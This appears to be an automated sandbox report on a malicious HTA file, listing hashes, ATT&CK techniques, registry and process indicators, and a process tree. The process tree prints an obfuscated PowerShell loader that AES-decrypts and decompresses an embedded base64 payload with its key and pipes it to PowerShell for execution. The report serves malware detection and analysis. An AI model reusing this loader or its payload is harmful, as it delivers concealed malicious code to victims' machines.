caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7

General

Target

caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta
Size

76KB
MD5

7e08e28d64e2026b8325935172c27c6b
SHA1

3be2858857ffba56416db3001a4f9a382a7404ec
SHA256

caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7
SHA512

816dd4906b26ac9fdaed836ca273588cac0d807868934715d500c3a9f8ad31bd11020d3a589d016a1c60c93fe714602f45963e78932b36ae1fa4cc54048190e9
SSDEEP

768:H0nzwRQmH5omBvaGGZFD9lu2drSX0kUG39UaZd4xJk0sS7:AzwGmHfBsZFDfu2dmX0kUmU/uS7

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2700	powershell.exe
2728	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1188 wrote to memory of 2700	1188	mshta.exe	28
PID 1188 wrote to memory of 2700	1188	mshta.exe	28
PID 1188 wrote to memory of 2700	1188	mshta.exe	28
PID 1188 wrote to memory of 2700	1188	mshta.exe	28
PID 2700 wrote to memory of 2728	2700	powershell.exe	30
PID 2700 wrote to memory of 2728	2700	powershell.exe	30
PID 2700 wrote to memory of 2728	2700	powershell.exe	30
PID 2700 wrote to memory of 2728	2700	powershell.exe	30

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1188
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $SNTyz = 'AAAAAAAAAAAAAAAAAAAAALmk2b6lObDopuf9qJWqGCtzC7CpptCgBnt5rHGdK0CvSJKhFnvqJYIoDdgjV85+2qtRocrUk9BcXKKoE9JsNJgtMBltspO1u78Mfl7YMlQ0P6ZscPVex7HSoCRP10vd0aIFQ1RIYahKuYd6bdmAphNVCCPHUBzYTI7VBNdM83D7XZFoec+s23GTfZWtuLYtYiS/OTUEzlhOwnMxN3sP2n8EbAo9BGzEBkxFbuCbhHyPb0i1m4H+rOtXNkftKSWiPM4ZXhtfLWDXCtqRIJhHmHUZErlqLgiNahl0E0q5FgZZm7OPmMEoMyuXzOzt1+cRrN1Ctv6HcMAYuAhBzws+/DaLNhYS+WE4CDQVfS8Ok13+MLPrzW7O9DoG3TCRFMLBTGp+78w993AYJtFm12crbdAyk79fGa6dn8PRunfMPiXcbyo2OkAJQE/5Sd5Qu6Wk7Dmxy98RYGde8kwD9ip5r7gf6c1124Am/BEazQnaTet4zRGw963Te9Jey/4OUUf7n/wQFzO68GOZebttJyOyf7t0YP+Phce1GZBsIMJ8r/OAa1QCgIBQ3bvh+Wb7pC4r1Bu+UgwFMnLY+oWJUr3sUMzcwoEDJylcmUbX1Usq77b1fKmB201lgyr0PKGLEt3IORnPBhTD81gOlFbkTg2IfcheTlv3Xu9kzvd3D0LOjJ6UHpKh1u7DWwC4qflR5AUIjGX81KrOdsIj4I8cSzvTEUbFoOe/Merccz3NEtk5Aq1z0o9g5fFuBaXQvrhGFkyOkdNFzRiCJEGtBWCt4ssADBmv0Mp4PLNrPGKQ+GKQNdRRdnRYWVcdDlQjvqRQoSBqMbb0RVi1bkQLcO0ZooLIzLbzcmwfgDvTyVCk2p/3p5mAhvJIGg+WcG7kH76z2nvrBGoVqQUzcEx6MvAzDXDb/VDkrzZz5DN6h42PvwxThFmO926dcbjgZUumX1jUcIsr+Cm4IQxjQnyZAscmjTeJ4WKfIU3zpS5dKT2LTLVjDxVUzzqlTmd/rBgzYJcQl1dlkMzxPLgnpQq/Pwf3+iGIYoW6TLrCGfenlPxiURCdq0ejJLKErJg0tIF+CxtB+v3FETsTyH0UkR5J3TwQjZHsgGZFNQLNnkBTwpdQAOsdW+LTRyRcION9/NP5yk3ZQHcSQeiNfbC4vS8iCRrjSR31swF/MC7PANy+yO7STigHV+6S5OCbKezZXAWlClJUP+G0Zg==';$NYvzm = 'dE92WmpUelNoc1NyUHdadGdKY1lsaHNuQWxvanpYdVg=';$JxlzVEaB = New-Object 'System.Security.Cryptography.AesManaged';$JxlzVEaB.Mode = [System.Security.Cryptography.CipherMode]::ECB;$JxlzVEaB.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$JxlzVEaB.BlockSize = 128;$JxlzVEaB.KeySize = 256;$JxlzVEaB.Key = [System.Convert]::FromBase64String($NYvzm);$CcxpA = [System.Convert]::FromBase64String($SNTyz);$cnnQFgZm = $CcxpA[0..15];$JxlzVEaB.IV = $cnnQFgZm;$LEiiXZOgN = $JxlzVEaB.CreateDecryptor();$AcOIkQZxG = $LEiiXZOgN.TransformFinalBlock($CcxpA, 16, $CcxpA.Length - 16);$JxlzVEaB.Dispose();$BMBI = New-Object System.IO.MemoryStream( , $AcOIkQZxG );$mZNCUMQO = New-Object System.IO.MemoryStream;$NPwQahcaV = New-Object System.IO.Compression.GzipStream $BMBI, ([IO.Compression.CompressionMode]::Decompress);$NPwQahcaV.CopyTo( $mZNCUMQO );$NPwQahcaV.Close();$BMBI.Close();[byte[]] $kiEmVbL = $mZNCUMQO.ToArray();$tsWNTzTK = [System.Text.Encoding]::UTF8.GetString($kiEmVbL);$tsWNTzTK | powershell -
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9XDMM4MWQQN3B85W8W7F.temp

Filesize
7KB

MD5
6db9d7b467a5b7a2b33479fe6f2be5c3

SHA1
e662f5127fdf5e7e40ef2567d6b79f938d356298

SHA256
bd0d01da7642750be8156ac66d0567b262da1b3d5e38eccb3fea72246c04b3d0

SHA512
2a99bda8af043257821a5f6afdc9ca5749cbcf1cdfe03d97eda6ee7c8371ced92b29ec055adaaf1cbbc6531ede953454d9e3d5b37e12ea2c3852fee2d95dde2c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
1KB

MD5
bc1c40d7229c0fe501ed99405f5c42b1

SHA1
09d903d82a9bd65a0bc92a01985fbfe50b6efc2e

SHA256
f241eb47293a2200dd0fd0c94655d5868814928816f352b4d1abcef014bd97bd

SHA512
c2f46425a0ec40b6d9a3cf00c3024f95edef60ed569534dd7acf4059eda3d6a621029be94c0674a80511c15341ef922da9fc16272d1f3b28398468efa4f6da08

Download Submit
memory/2700-2-0x0000000074710000-0x0000000074CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2700-3-0x0000000074710000-0x0000000074CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2700-5-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/2700-4-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/2700-15-0x0000000074710000-0x0000000074CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2728-12-0x0000000002700000-0x0000000002740000-memory.dmp

Filesize
256KB

Download
memory/2728-11-0x0000000074710000-0x0000000074CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2728-14-0x0000000074710000-0x0000000074CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2728-13-0x0000000074710000-0x0000000074CBB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing